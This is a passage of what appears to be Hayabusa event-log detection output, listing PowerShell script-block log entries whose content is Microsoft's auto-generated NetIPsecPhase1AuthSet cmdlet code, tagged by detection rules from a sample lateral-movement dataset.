$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exc",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exc",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 